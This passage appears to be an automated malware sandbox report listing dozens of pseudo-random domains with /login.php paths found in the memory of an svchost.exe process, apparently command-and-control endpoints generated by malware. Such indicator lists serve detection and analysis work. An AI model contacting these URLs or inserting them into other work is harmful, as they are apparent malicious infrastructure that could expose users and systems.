Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybyq.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycil.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076266061.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076877673.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583628686.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytov.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677370305.0000000005A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyp.com/
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywoq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvybuv.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.php
Source: svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1638315636.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638005.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjyl.com/login.php
Source: svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523662204.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1733345122.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvylyg.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymaq.com/login.php
